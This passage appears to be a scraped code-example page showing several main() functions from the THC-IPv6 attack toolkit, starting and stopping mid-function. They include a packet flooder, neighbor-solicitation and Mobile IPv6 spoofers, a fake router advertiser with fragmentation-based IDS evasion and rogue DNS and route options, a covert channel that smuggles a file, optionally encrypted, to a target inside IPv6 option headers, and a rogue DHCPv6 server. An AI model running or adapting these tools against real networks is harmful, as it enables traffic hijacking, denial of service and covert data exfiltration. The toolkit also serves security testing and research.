      }

/* attach the IPv6+ICMPv6+SeND to an Ethernet frame with random MAC */
      if ((result = thc_generate_pkt(dev, test, tgthw, pkt, &pkt_len)) < 0) {
        fprintf(stderr, "Couldn't generate IPv6 packet, error num %d !\n", result);
        exit(1);
      }

      printf("Sending %d...", i);
      fflush(stdout);
      while (count) {

/* send many packets */
        thc_send_pkt(dev, pkt, &pkt_len);
        --count;
      }
      exit(1);
    }
  }
  wait(&status);

  return 0;
}
예제 #19
0
int main(int argc, char *argv[]) {
    unsigned char *pkt1 = NULL, buf[24], buf2[6], buf3[1500];
    unsigned char *unicast6, *src6 = NULL, *dst6 = NULL, srcmac[16] = "", *mac = srcmac;
    int pkt1_len = 0, flags, prefer = PREFER_GLOBAL, i, do_hop = 0, do_dst = 0, do_frag = 0, cnt, type = NXT_ICMP6, offset = 14;
    char *interface;
    int rawmode = 0;
    thc_ipv6_hdr *hdr;

    if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
        help(argv[0]);

    if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);

    while ((i = getopt(argc, argv, "DFHr")) >= 0) {
        switch (i) {
        case 'r':
            thc_ipv6_rawmode(1);
            rawmode = 1;
            break;
        case 'F':
            do_frag++;
            break;
        case 'H':
            do_hop = 1;
            break;
        case 'D':
            do_dst = 1;
            break;
        default:
            fprintf(stderr, "Error: invalid option %c\n", i);
            exit(-1);
        }
    }

    if (argc - optind < 2)
        help(argv[0]);

    if (do_hdr_size)
        offset = do_hdr_size;
    interface = argv[optind];
    if ((unicast6 = thc_resolve6(argv[optind + 1])) == NULL) {
        fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[optind + 1]);
        exit(-1);
    }
    if (argc - optind >= 3 && argv[optind + 2] != NULL)
        dst6 = thc_resolve6(argv[optind + 2]);
    else
        dst6 = thc_resolve6("ff02::1");
    if (dst6 == NULL) {
        fprintf(stderr, "Error: could not resolve destination of solicitate: %s\n", argv[optind + 2]);
        exit(-1);
    }
    if (rawmode == 0) {
        if (argc - optind >= 4 && argv[optind + 3] != NULL)
            sscanf(argv[optind + 3], "%x:%x:%x:%x:%x:%x", (unsigned int *) &srcmac[0], (unsigned int *) &srcmac[1], (unsigned int *) &srcmac[2], (unsigned int *) &srcmac[3],
                   (unsigned int *) &srcmac[4], (unsigned int *) &srcmac[5]);
        else
            mac = thc_get_own_mac(interface);
    }
    if (argc - optind >= 5 && argv[optind + 4] != NULL)
        src6 = thc_resolve6(argv[optind + 4]);
    else
        src6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK);

    if (mac == NULL || src6 == NULL) {
        fprintf(stderr, "Error: invalid interface %s or invalid mac/ip defined\n", interface);
        exit(-1);
    }

    memset(buf, 0, sizeof(buf));
    memcpy(buf, unicast6, 16);
    buf[16] = 1;
    buf[17] = 1;
    memcpy(&buf[18], mac, 6);
    flags = 0; // ICMP6_NEIGHBORADV_OVERRIDE;
    memset(buf2, 0, sizeof(buf2));
    memset(buf3, 0, sizeof(buf3));

    if ((pkt1 = thc_create_ipv6_extended(interface, prefer, &pkt1_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
        return -1;
    if (do_hop) {
        type = NXT_HBH;
        if (thc_add_hdr_hopbyhop(pkt1, &pkt1_len, buf2, sizeof(buf2)) < 0)
            return -1;
    }
    if (do_frag) {
        if (type == NXT_ICMP6)
            type = NXT_FRAG;
        for (i = 0; i <= do_frag; i++)
            if (thc_add_hdr_oneshotfragment(pkt1, &pkt1_len, cnt++) < 0)
                return -1;
    }
    if (do_dst) {
        if (type == NXT_ICMP6)
            type = NXT_DST;
        if (thc_add_hdr_dst(pkt1, &pkt1_len, buf3, sizeof(buf3)) < 0)
            return -1;
    }
    if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_NEIGHBORSOL, 0, flags, (unsigned char *) &buf, 24, 0) < 0)
        return -1;
    if (thc_generate_pkt(interface, mac, NULL, pkt1, &pkt1_len) < 0) {
        fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
        exit(-1);
    }

    printf("Starting solicitation of %s (Press Control-C to end)\n", argv[optind + 1]);
    while (1) {
        if (do_dst) {
            hdr = (thc_ipv6_hdr *) pkt1;
            thc_send_as_fragment6(interface, src6, dst6, type, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240);
        } else {
            thc_send_pkt(interface, pkt1, &pkt1_len);
        }
        sleep(5);
    }

    return 0;
}
예제 #20
0
int main(int argc, char *argv[]) {
  unsigned char *pkt1 = NULL;
  unsigned char *h = NULL, *ha = NULL, *coa = NULL, *mac = NULL;
  int pkt1_len = 0, rawmode = 0;
  unsigned int id = 2, i;
  char *interface;
  thc_ipv6_hdr *hdr;

  if (argc < 4 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (strcmp(argv[1], "-r") == 0) {
    thc_ipv6_rawmode(1);
    rawmode = 1;
    argv++;
    argc--;
  }

  interface = argv[1];
  h = thc_resolve6(argv[2]);
  ha = thc_resolve6(argv[3]);
  coa = thc_resolve6(argv[4]);

  if (rawmode == 0 && (mac = thc_get_mac(interface, coa, ha)) == NULL) {
    fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]);
    exit(-1);
  }
  
  if (thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }

  for (i = 0; i < 4; i++) {
    memset(buf, 0, sizeof(buf));
    buf[0] = 1;
    buf[1] = 2;
    buf[4] = 201;
    buf[5] = 16;
    memcpy(&buf[6], h, 16);
    buf_len = 22;

    if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt1_len, coa, ha, 64, 0, 0, 0, 0)) == NULL)
      return -1;
    hdr = (thc_ipv6_hdr *) pkt1;
    hdr->original_src = h;
    if (thc_add_hdr_dst(pkt1, &pkt1_len, buf, buf_len) < 0)
      return -1;
    memset(buf, 0, sizeof(buf));
    buf[0] = 59;
    buf[1] = 3;
    buf[2] = 5;
    buf[3] = 0;
    buf[6] = (id % 65536) / 256;
    buf[7] = id % 256;
    buf[8] = 192;
    buf[10] = 0xff;
    buf[11] = 0xff;
    buf[12] = 1;
    buf[14] = 3;
    buf[15] = 16;
    memcpy(&buf[16], coa, 16);
    buf_len = 32;
    if (thc_add_data6(pkt1, &pkt1_len, NXT_MIPV6, buf, buf_len) < 0)
      return -1;

    thc_generate_and_send_pkt(interface, NULL, mac, pkt1, &pkt1_len);

    id += 16384;
  }

  return 0;
}
예제 #21
0
int main(int argc, char *argv[]) {
  char *interface, mac[16] = "", dmac[16] = "";
  unsigned char *routerip6, *mac6 = NULL, *ip6 = NULL;
  unsigned char buf[512], *ptr, buf2[6], string[] = "ip6 and icmp6 and dst ff02::2";
  unsigned char rbuf[MAX_ENTRIES + 1][17], pbuf[MAX_ENTRIES + 1][17], *dbuf[MAX_ENTRIES + 1];
  unsigned char *dst = thc_resolve6("ff02::1");
  unsigned char *dstmac = thc_get_multicast_mac(dst);
  int size, mtu = 0, i, j, k, l, m, n, rcnt = 0, pcnt = 0, dcnt = 0, sent = 0;
  unsigned char *pkt = NULL, *searchlist = NULL;
  int pkt_len = 0;
  pcap_t *p;

  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  memset(rbuf, 0, sizeof(rbuf));
  memset(mac, 0, sizeof(mac));

  while ((i = getopt(argc, argv, "i:r:E:R:M:m:S:s:D:L:A:a:r:d:t:T:p:n:l:F:")) >= 0) {
    switch (i) {
    case 'i':
      interval = atoi(optarg);
      break;
    case 'm':
      sscanf(optarg, "%x:%x:%x:%x:%x:%x", (unsigned int *) &dmac[0], (unsigned int *) &dmac[1], (unsigned int *) &dmac[2], (unsigned int *) &dmac[3], (unsigned int *) &dmac[4],
             (unsigned int *) &dmac[5]);
      dstmac = dmac;
      break;
    case 'S':
      sscanf(optarg, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4],
             (unsigned int *) &mac[5]);
      mac6 = mac;
      break;
    case 's':
      if ((ip6 = thc_resolve6(optarg)) == NULL) {
        fprintf(stderr, "Error: can not resolve source ip address %s\n", optarg);
        exit(-1);
      }
      break;
    case 'M':
      mtu = atoi(optarg);
      if (mtu < 0 || mtu > 65535) {
        fprintf(stderr, "Error: mtu argument is invalid: %s\n", optarg);
        exit(-1);
      }
      if (mtu < 1228 || mtu > 1500)
        fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing: %d\n", mtu);
      break;
    case 'n':
      to_send = atoi(optarg);
      if (to_send < 1 || mtu > 255) {
        fprintf(stderr, "Error: -n argument is invalid, must be between 1 and 255: %s\n", optarg);
        exit(-1);
      }
      break;
    case 'A':
      if (pcnt >= MAX_ENTRIES) {
        fprintf(stderr, "Error: you can not define more than %d autoconfig addresses\n", MAX_ENTRIES);
        exit(-1);
      }
      if (optarg == NULL || (ptr = index(optarg, '/')) == NULL) {
        fprintf(stderr, "Error: -A option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. fd00::/64 : %s\n", optarg);
        exit(-1);
      }
      *ptr++ = 0;
      if ((size = atoi(ptr)) < 0 && size > 255) {       // yes we allow bad sizes :-)
        fprintf(stderr, "Error: -A option prefix length must be between 0 and 128: %s\n", optarg);
        exit(-1);
      }
      if (size != 64)
        fprintf(stderr, "Warning: -A option defines an unusual prefix length: %d\n", size);
      if (index(optarg, ':') == NULL)
        strcat(optarg, "::");
      if ((routerip6 = thc_resolve6(optarg)) == NULL) {
        fprintf(stderr, "Error: -A option network is invalid: %s\n", optarg);
        exit(-1);
      }
      pbuf[pcnt][0] = size % 256;
      memcpy((char *) &pbuf[pcnt][1], routerip6, 16);
      pcnt++;
      break;
    case 'a':
      plife = atoi(optarg);
      break;
    case 'r':
      rlife = atoi(optarg);
      break;
    case 'd':
      dlife = atoi(optarg);
      break;
    case 'l':
      llife = atoi(optarg);
      break;
    case 'T':
      reach = atoi(optarg);
      break;
    case 't':
      trans = atoi(optarg);
      break;
    case 'p':
      if (strncasecmp(optarg, "low", 3) == 0)
        prio = 0;
      else
        if (strncasecmp(optarg, "med", 3) == 0)
          prio = 1;
        else
          if (strncasecmp(optarg, "hi", 2) == 0)
            prio = 2;
          else
            if (strncasecmp(optarg, "res", 3) == 0)
              prio = 3;
            else {
              fprintf(stderr, "Error: unknown priority, known keywords are low, medium and high: %s\n", optarg);
              exit(-1);
            }
      break;
    case 'R':
      if (rcnt >= MAX_ENTRIES) {
        fprintf(stderr, "Error: you can not define more than %d routes\n", MAX_ENTRIES);
        exit(-1);
      }
      if (optarg == NULL || (ptr = index(optarg, '/')) == NULL) {
        fprintf(stderr, "Error: -R option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. fd00::/64 : %s\n", optarg);
        exit(-1);
      }
      *ptr++ = 0;
      if ((size = atoi(ptr)) < 0 && size > 255) {       // yes we allow bad sizes :-)
        fprintf(stderr, "Error: -R option prefix length must be between 0 and 128: %s\n", optarg);
        exit(-1);
      }
      if (index(optarg, ':') == NULL)
        strcat(optarg, "::");
      if ((routerip6 = thc_resolve6(optarg)) == NULL) {
        fprintf(stderr, "Error: -R option network is invalid: %s\n", optarg);
        exit(-1);
      }
      rbuf[rcnt][0] = size % 256;
      memcpy((char *) &rbuf[rcnt][1], routerip6, 16);
      rcnt++;
      break;
    case 'D':
      if (dcnt >= MAX_ENTRIES) {
        fprintf(stderr, "Error: you can not define more than %d DNS servers\n", MAX_ENTRIES);
        exit(-1);
      }
      if ((dbuf[dcnt++] = thc_resolve6(optarg)) == NULL) {
        fprintf(stderr, "Error: can not resolve DNS server %s\n", optarg);
        exit(-1);
      }
      break;
    case 'L':
      searchlist = optarg;
      break;
    case 'E':
      if (optarg == NULL) {
        fprintf(stderr, "Error: no option type given for -E\n");
        exit(-1);
      }
      for (j = 0; j < strlen(optarg); j++) {
        switch (optarg[j]) {    // fall through to be fail safe on accidental misuse
        case '0':              // fall through
        case 'O':
          do_overlap = 1;
          break;
        case 'o':
          do_overlap = 2;
          break;
        case '1':              // fall through
        case 'l':              // fall through
        case 'L':
          do_frag++;
          break;
        case 'h':              // fall through
        case 'H':
          do_hop = 1;
          break;
        case 'd':              // fall through
        case 'D':
          do_dst = 1;
          break;
        default:
          fprintf(stderr, "Error: unknown evasion type %c!\n", optarg[j]);
          exit(-1);
        }
        if ((do_frag && (do_dst || do_overlap)) || (do_dst && do_overlap)) {
          fprintf(stderr, "Error: you can not use -E types 1, D, O and o together!\n");
          exit(-1);
        }
      }
      break;
    case 'F':
        ptr = strtok(optarg, ",");
        while (ptr != NULL) {
          if (strncasecmp(ptr, "man", 3) == 0)
            flags = (flags | 128);
          else if (strncasecmp(ptr, "oth", 3) == 0)
            flags = (flags | 64);
          else if (strncasecmp(ptr, "hom", 3) == 0)
            flags = (flags | 32);
          else if (strncasecmp(ptr, "prox", 4) == 0)
            flags = (flags | 4);
          else if (strncasecmp(ptr, "res", 3) == 0)
            flags = (flags | 2);
          else if (strncasecmp(ptr, "unk", 3) == 0)
            flags = (flags | 1);
          else {
            fprintf(stderr, "Error: unknown flag: %s\n", ptr);
            exit(-1);
          }
          ptr = strtok(NULL, ",");
        }
      break;
    default:
      fprintf(stderr, "Error: invalid option %c\n", i);
      exit(-1);
    }
  }

  if ((argc - optind) < 1 || (argc - optind) > 2)
    help(argv[0]);

  if (do_hdr_size)
    myoff = do_hdr_size;
  interface = argv[optind];
  if (argc - optind == 2)
    if ((dst = thc_resolve6(argv[optind + 1])) == NULL) {
      fprintf(stderr, "Error: invalid target %s\n", argv[optind + 1]);
      exit(-1);
    }
  if (mtu == 0)
    mtu = thc_get_mtu(interface);
  if (mac6 == NULL)
    if ((mac6 = thc_get_own_mac(interface)) == NULL) {
      fprintf(stderr, "Error: invalid interface %s\n", interface);
      exit(-1);
    }
  if (ip6 == NULL)
    if ((ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK)) == NULL) {
      fprintf(stderr, "Error: IPv6 is not enabled on interface %s\n", interface);
      exit(-1);
    }
//  if (dns == NULL)
//    dns = thc_resolve6("ff02::fb");

  frint = interface;
  frip6 = ip6;
  frmac = mac6;
  frbuf = buf;
  frbuf2 = buf2;
  frbuf2len = sizeof(buf2);

  memset(buf, 0, sizeof(buf));
  memset(buf2, 0, sizeof(buf2));
  memset(buf3, 0, sizeof(buf3));

  if (llife > 0xffff)
    llife = 0xffff;
  llife = (llife | 0xff000000);
  if (prio == 2)
    llife = (llife | 0x00080000);
  else if (prio == 0)
    llife = (llife | 0x00180000);
  else if (prio != 1)
    llife = (llife | 0x00100000);
  
  llife = (llife | (flags << 16));

  buf[0] = reach / 16777216;
  buf[1] = (reach % 16777216) / 65536;
  buf[2] = (reach % 65536) / 256;
  buf[3] = reach % 256;
  buf[4] = trans / 16777216;
  buf[5] = (trans % 16777216) / 65536;
  buf[6] = (trans % 65536) / 256;
  buf[7] = trans % 256;

  // option mtu
  buf[8] = 5;
  buf[9] = 1;
  buf[12] = mtu / 16777216;
  buf[13] = (mtu % 16777216) / 65536;
  buf[14] = (mtu % 65536) / 256;
  buf[15] = mtu % 256;
  i = 16;

  // mac address option
  buf[i++] = 1;
  buf[i++] = 1;
  memcpy(buf + i, mac6, 6);
  i += 6;

  // option prefix, put all in
  if (pcnt > 0)
    for (j = 0; j < pcnt; j++) {
      buf[i++] = 3;
      buf[i++] = 4;
      buf[i++] = pbuf[j][0];    // prefix length
      buf[i++] = 128 + 64;
      buf[i++] = plife / 16777216;
      buf[i++] = (plife % 16777216) / 65536;
      buf[i++] = (plife % 65536) / 256;
      buf[i++] = plife % 256;
      buf[i++] = (plife / 2) / 16777216;
      buf[i++] = ((plife / 2) % 16777216) / 65536;
      buf[i++] = ((plife / 2) % 65536) / 256;
      buf[i++] = (plife / 2) % 256;
      i += 4;                   // + 4 bytes reserved
      memcpy(&buf[i], (char *) &pbuf[j][1], 16);
      i += 16;
    }
  // route option, put all in
  if (rcnt > 0)
    for (j = 0; j < rcnt; j++) {
      buf[i++] = 0x18;          // routing entry option type
      buf[i++] = 0x03;          // length 3 == 24 bytes
      buf[i++] = rbuf[j][0];    // prefix length
      if (prio == 2)
        buf[i++] = 0x08;          // priority, highest of course
      else if (prio == 1)
        buf[i++] = 0x00;
      else if (prio == 0)
        buf[i++] = 0x18;
      else
        buf[i++] == 0x10;
      buf[i++] = rlife / 16777216;
      buf[i++] = (rlife % 16777216) / 65536;
      buf[i++] = (rlife % 65536) / 256;
      buf[i++] = rlife % 256;
      memcpy((char *) &buf[i], (char *) &rbuf[j][1], 16);       // network
      i += 16;
    }
  // dns option
  if (dcnt > 0)
    for (j = 0; j < dcnt; j++) {
      buf[i++] = 0x19;          // dns option type
      buf[i++] = 0x03;          // length
      i += 2;                   // reserved
      buf[i++] = dlife / 16777216;
      buf[i++] = (dlife % 16777216) / 65536;
      buf[i++] = (dlife % 65536) / 256;
      buf[i++] = dlife % 256;
      memcpy(buf + i, dbuf[j], 16);     // dns server
      i += 16;
    }
    
  // dns searchlist option
  if (searchlist != NULL) {
    buf[i] = 31;
    buf[i + 4] = dlife / 16777216;
    buf[i + 5] = (dlife % 16777216) / 65536;
    buf[i + 6] = (dlife % 65536) / 256;
    buf[i + 7] = dlife % 256;
    if (searchlist[strlen(searchlist) - 1] == '.')
      searchlist[strlen(searchlist) - 1] = 0;
    m = 0;
    while ((ptr = strstr(searchlist, ".,")) != NULL) {
      m = strlen(ptr);
      for (l = 1; l < m; l++)
        ptr[l - 1] = ptr[l];
      ptr[m - 1] = 0;
    }
    l = 0;
    m = 0;
    j = strlen(searchlist);
    do {
      k = 0;
      ptr = index(&searchlist[l], '.');
      if (ptr == NULL || (index(&searchlist[l], ',') != NULL && (char*)ptr > (char*)index(&searchlist[l], ','))) {
        k = 1;
        ptr = index(&searchlist[l], ',');
      }
      if (ptr != NULL)
        *ptr = 0;
      n = strlen(&searchlist[l]);

      buf[i + 8 + m] = n;
      memcpy(&buf[i + 8 + m + 1], &searchlist[l], n);

      if (ptr == NULL)
        l = j;
      else
        l += 1 + n;

      m += 1 + n;

      if (k || ptr == NULL)
        m++; // end of domain entry
    } while (l < j && ptr != NULL);
    if (m % 8 > 0)
      m = ( (m / 8) + 1 ) * 8;
    buf[i + 1] = m/8 + 1;
    i += m + 8;
  }

  frbuflen = i;

  if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL)
    return -1;

  if (do_hop) {
    type = NXT_HBH;
    if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, 6) < 0)
      return -1;
  }
  if (do_frag) {
    type = NXT_FRAG;
    for (j = 0; i < do_frag; j++)
      if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, getpid() + (cnt++ << 16)) < 0)
        return -1;
  }

  if (do_dst) {
    if (type == NXT_ICMP6)
      type = NXT_DST;
    if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0)
      return -1;
  }
  if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, llife, buf, i, 0) < 0)
    return -1;
  if (thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0)
    return -1;
  frhdr = (thc_ipv6_hdr *) pkt;
//printf("DEBUG: RA size is %d bytes, do_dst %d, do_overlap %d\n", i + 8, do_dst, do_overlap);

  // init pcap
  if ((p = thc_pcap_init(interface, string)) == NULL) {
    fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
    exit(-1);
  }

  printf("Starting to advertise router (Press Control-C to end) ...\n");
  while (sent < to_send || to_send > 255) {
    if (do_dst) {
      thc_send_as_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232);
    } else if (do_overlap) {
      if (do_overlap == 1)
        thc_send_as_overlapping_first_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0);
      else
        thc_send_as_overlapping_last_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0);
    } else {
      thc_send_pkt(interface, pkt, &pkt_len);
    }
    while (thc_pcap_check(p, (char *) send_rs_reply, NULL) > 0);
    sent++;
    if (sent != to_send || to_send > 255)
      sleep(interval);
  }
  return 0; // never reached
}
예제 #22
0
int main(int argc, char *argv[]) {
  unsigned char *pkt1 = NULL, rbuf[3570], wbuf[3570], buf[4000];
  unsigned char *src6 = NULL, *dst6 = NULL, srcmac[6] = "", *mac = srcmac, *dmac;
  int pkt1_len = 0, flags = 0, i = 0, mtu = 0, bytes, seq = 0, id, rounds, wbytes, bufsize = 0, send = 2, num = 0;
  char *interface, *key = NULL, hash[20], vec[8] = { 0, 0, 0, 0, 0, 0, 0, 0 };;
  int rawmode = 0, tcp_port = -1;
  FILE *f;
  BF_KEY bfkey;

  if (argc < 4 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  while ((i = getopt(argc, argv, "rm:k:s:")) >= 0) {
    switch (i) {
    case 'r':
      rawmode = 1;
      thc_ipv6_rawmode(1);
      break;
    case 'k':
      key = optarg;
      break;
    case 'm':
      mtu = atoi(optarg);
      break;
    case 's':
      send = atoi(optarg);
      break;
    default:
      exit(-1);
    }
  }

  if (argc < optind + 2) {
    fprintf(stderr, "Error: Not enough parameters!\n");
    help(argv[0]);
  }

  interface = argv[optind];
  dst6 = thc_resolve6(argv[optind + 1]);
  if ((f = fopen(argv[optind + 2], "r")) == NULL) {
    fprintf(stderr, "Error: file %s not found\n", argv[optind + 2]);
    exit(-1);
  }
  if (argc >= optind + 4 && argv[optind + 3] != NULL)
    tcp_port = atoi(argv[optind + 3]);

  if (mtu == 0)
    mtu = thc_get_mtu(interface);
  if (mtu <= 1000) {
    fprintf(stderr, "Error: MTU of interface %s must be at least 1000 bytes\n", interface);
    exit(-1);
  }
  mac = thc_get_own_mac(interface);
  src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
  if ((dmac = thc_get_mac(interface, src6, dst6)) == NULL) {
    fprintf(stderr, "Error: can not get MAC for target\n");
    exit(-1);
  }
  srand(getpid());
  mtu -= 128;
  if (mtu % 255 == 0)
    i = 2 * (mtu / 255);
  else
    i = 2 + 2 * (mtu / 255);
  mtu = mtu - i;
  if ((mtu + i + 14) % 8 > 0)
    mtu = (((mtu + i + 14) / 8) * 8) - (i + 14);
  if (mtu > 14 * 255)
    mtu = 14 * 255;
  if (key != NULL) {
    memset(&bfkey, 0, sizeof(bfkey));
    SHA1((unsigned char *) key, strlen(key), (unsigned char *) hash);
    BF_set_key(&bfkey, sizeof(hash), (unsigned char *) hash);
    memset(vec, 0, sizeof(vec));
    num = 0;
  }

  id = rand();
  buf[0] = 16;
  buf[1] = 4;
  memcpy(buf + 2, (char *) &id, 4);
  buf[6] = 17;
  buf[7] = 4;

  while ((bytes = fread(rbuf, 1, mtu, f)) > 0) {
    seq++;
    if (key != NULL) {
      BF_cfb64_encrypt((unsigned char *) rbuf, (unsigned char *) wbuf, bytes, &bfkey, (unsigned char *) vec, &num, BF_ENCRYPT);
      memcpy(rbuf, wbuf, bytes);
    }
    memcpy(buf + 8, (char *) &seq, 4);
    bufsize = 12;
    rounds = bytes / 255;
    for (i = 0; i <= rounds; i++) {
      buf[bufsize] = i + 18;
      if (i == rounds)
        wbytes = bytes % 255;
      else
        wbytes = 255;
      buf[bufsize + 1] = wbytes;
      memcpy(buf + bufsize + 2, rbuf + 255 * i, wbytes);
      bufsize += wbytes + 2;
    }
    if (bytes < mtu) {
      buf[bufsize] = 0x1f;
      buf[bufsize + 1] = 0;
      bufsize = bufsize + 2;
    }

    if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt1_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
      return -1;
    if (thc_add_hdr_dst(pkt1, &pkt1_len, buf, bufsize))
      return -1;
    if (tcp_port == -1) {
      if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_ECHOREQUEST, 0, flags, NULL, 0, 0) < 0)
        return -1;
    } else {
      if (thc_add_tcp(pkt1, &pkt1_len, (rand() % 45536) + 10000, tcp_port, rand(), 0, TCP_SYN, 5760, 0, NULL, 0, NULL, 0) < 0)
        return -1;
    }
    if (thc_generate_pkt(interface, mac, dmac, pkt1, &pkt1_len) < 0) {
      fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
      exit(-1);
    }
    printf("Sending packet seq# %d\n", seq);
    for (i = 0; i < send; i++) {
      thc_send_pkt(interface, pkt1, &pkt1_len);
      usleep(100);
    }
  }
  printf("All sent.\n");
  return 0;
}
예제 #23
0
파일: fake_dhcps6.c 프로젝트: BwRy/thc-ipv6
int main(int argc, char *argv[]) {
  char *routerip, *interface, mac[16] = "";
  char rdatabuf[1024], wdatabuf[1024], cmsgbuf[1024], mybuf[1024];
  unsigned char *routerip6, *mac6 = mac, *ip6, *ptr, *ptr1, *ptr2, *ptr3;
  unsigned char *dns;
  int size, fromlen = 0, /*mtu = 1500, */ i, j, k, l, m, s, len, t, mlen, csize = 0;
  static struct iovec iov;
  struct sockaddr_storage from;
  struct msghdr mhdr;
  struct sockaddr_in6 ddst;
  unsigned long long int count = 0;

  if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  if (getenv("THC_IPV6_PPPOE") != NULL || getenv("THC_IPV6_6IN4") != NULL) printf("WARNING: %s is not working with injection!\n", argv[0]);

  if (strcmp(argv[1], "-r") == 0) {     // is ignored
    argv++;
    argc--;
  }

  memset(mac, 0, sizeof(mac));
  interface = argv[1];
  if (thc_get_own_mac(interface) == NULL) {
    fprintf(stderr, "Error: invalid interface %s\n", interface);
    exit(-1);
  }
  if (argc >= 6 && (ptr = argv[5]) != NULL)
    sscanf(ptr, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4],
           (unsigned int *) &mac[5]);
  else
    mac6 = thc_get_own_mac(interface);

  if (argc >= 5 && argv[4] != NULL)
    ip6 = thc_resolve6(argv[4]);
  else
    ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK);

  if (argc >= 4 && argv[3] != NULL)
    dns = thc_resolve6(argv[3]);
  else
    dns = thc_resolve6("ff02::fb");

  routerip = argv[2];
  if ((ptr = index(routerip, '/')) == NULL) {
    printf("Error: Option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. ff80::01/16\n");
    exit(-1);
  }
  *ptr++ = 0;
  size = atoi(ptr);

  routerip6 = thc_resolve6(routerip);

  if (routerip6 == NULL || size < 1 || size > 128) {
    fprintf(stderr, "Error: IP-ADDRESS/PREFIXLENGTH argument is invalid: %s\n", argv[2]);
    exit(-1);
  }
  if (size < 64) {
    fprintf(stderr, "Warning: network prefix must be a minimum of /64, resizing to /64\n");
    size = 64;
  }
  if (size % 8 > 0) {
    size = ((size / 8) + 1) * 8;
    fprintf(stderr, "Warning: prefix must be a multiple of 8, resizing to /%d\n", csize * 8);
  }
  csize = 8 - ((size - 64) / 8);
  if (dns == NULL) {
    fprintf(stderr, "Error: dns argument is invalid: %s\n", argv[3]);
    exit(-1);
  }
  if (ip6 == NULL) {
    fprintf(stderr, "Error: link-local-ip6 argument is invalid: %s\n", argv[4]);
    exit(-1);
  }

/*
  if (mtu < 1 || mtu > 65536) {
    fprintf(stderr, "Error: mtu argument is invalid: %s\n", argv[5]);
    exit(-1);
  }
  if (mtu < 1228 || mtu > 1500)
    fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing :%d\n", mtu);
*/
  if (mac6 == NULL) {
    fprintf(stderr, "Error: mac address in invalid\n");
    exit(-1);
  }

  if ((s = thc_bind_udp_port(547)) < 0) {
    fprintf(stderr, "Error: could not bind to 547/udp\n");
    exit(-1);
  }
  if (thc_bind_multicast_to_socket(s, interface, thc_resolve6("ff02::1:2")) < 0 || thc_bind_multicast_to_socket(s, interface, thc_resolve6("ff02::1:3")) < 0) {
    fprintf(stderr, "Error: could not bind multicast address\n");
    exit(-1);
  }
  if ((t = socket(AF_INET6, SOCK_DGRAM, 0)) < 0) {
    perror("Error:");
    exit(-1);
  }

  memset(mybuf, 0, sizeof(mybuf));
  mybuf[1] = 2;
  mybuf[3] = 14;
  mybuf[5] = 1;
  mybuf[7] = 1;
  // mybuf + 8 == time
  memcpy(mybuf + 12, mac6, 6);
  mlen = 18;
  mybuf[mlen + 1] = 23;
  mybuf[mlen + 3] = 16;
  memcpy(mybuf + mlen + 4, dns, 16);
  mlen += 20;

  printf("Starting to fake dhcp6 server on %s for %s (Press Control-C to end) ...\n\n", interface, argv[2]);
  while (1) {
    memset((char *) &from, 0, sizeof(from));
    memset(&iov, 0, sizeof(iov));
    memset(&mhdr, 0, sizeof(mhdr));
    iov.iov_base = rdatabuf;
    iov.iov_len = sizeof(rdatabuf);
    mhdr.msg_name = &from;
    mhdr.msg_namelen = sizeof(from);
    mhdr.msg_iov = &iov;
    mhdr.msg_iovlen = 1;
    mhdr.msg_control = (caddr_t) cmsgbuf;
    mhdr.msg_controllen = sizeof(cmsgbuf);
    if ((len = recvmsg(s, &mhdr, 0)) > 0) {
      fromlen = mhdr.msg_namelen;
      if (debug)
        thc_dump_data(rdatabuf, len, "Received Packet");
